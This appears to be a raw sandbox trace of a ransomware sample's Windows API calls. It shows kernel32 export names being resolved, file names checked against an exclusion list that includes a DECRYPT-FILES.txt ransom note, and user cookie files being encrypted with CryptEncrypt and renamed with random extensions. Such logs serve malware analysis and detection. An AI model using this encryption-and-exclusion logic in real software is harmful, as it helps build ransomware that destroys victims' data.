[0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.994] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.994] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.994] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.994] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.994] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.994] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.995] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.995] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.995] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.995] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.995] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.995] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.995] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.995] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.995] lstrlenA (lpString="DELETEATOM") returned 10 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.995] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.995] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.995] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.995] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.995] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.995] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.995] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.995] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.995] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.995] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.996] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.996] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.996] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.996] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.996] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.996] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.996] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.996] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.996] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.996] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.996] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.996] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.996] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.996] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.996] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.996] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.996] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.997] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.997] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.997] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.997] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.997] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.997] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.997] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.997] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.997] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.997] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.997] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.997] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.997] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.997] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.997] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.997] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.998] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr") returned 116 [0181.998] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr.niyBw") returned 122 [0181.998] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dier"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr.niyBw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dier.niybw"), dwFlags=0x0) returned 1 [0181.999] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.999] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.000] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.000] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf54e030, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf54e030, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xaba5d300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", cAlternateFileName="5P5NRG~1.MQP")) returned 1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="DECRYPT-FILES.txt") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="autorun.inf") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="boot.ini") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="desktop.ini") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="ntuser.dat") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="iconcache.db") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="bootsect.bak") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="ntuser.dat.log") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="thumbs.db") returned -1 [0182.000] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz", lpString2="Bootfont.bin") returned -1 [0182.000] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz") returned 45 [0182.000] lstrcmpiW (lpString1="mqpz", lpString2="lnk") returned 1 [0182.000] lstrcmpiW (lpString1="mqpz", lpString2="exe") returned 1 [0182.000] lstrcmpiW (lpString1="mqpz", lpString2="sys") returned -1 [0182.000] lstrcmpiW (lpString1="mqpz", lpString2="dll") returned 1 [0182.000] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0182.000] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz") returned 45 [0182.000] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0182.000] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz" [0182.000] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.001] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=442) returned 1 [0182.001] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.001] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.001] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.001] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0182.001] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.002] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0182.002] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.003] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.003] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.003] CloseHandle (hObject=0x288) returned 1 [0182.003] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.003] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0182.004] CloseHandle (hObject=0x0) returned 0 [0182.004] CloseHandle (hObject=0x284) returned 1 [0182.004] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.005] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.005] GetTickCount () returned 0x1134e40 [0182.005] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.005] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.005] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.005] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.005] lstrlenA (lpString="kernel32.dll") returned 12 [0182.006] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.006] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.006] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.006] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.006] lstrlenA (lpString="ADDATOMA") returned 8 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.006] lstrlenA (lpString="ADDATOMW") returned 8 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.006] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0182.006] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.006] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.006] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.006] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.006] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.006] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.006] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.006] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.006] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.006] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.006] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.006] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.006] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.007] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.007] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.007] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.007] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.007] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.007] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.007] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.007] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.007] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.007] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" 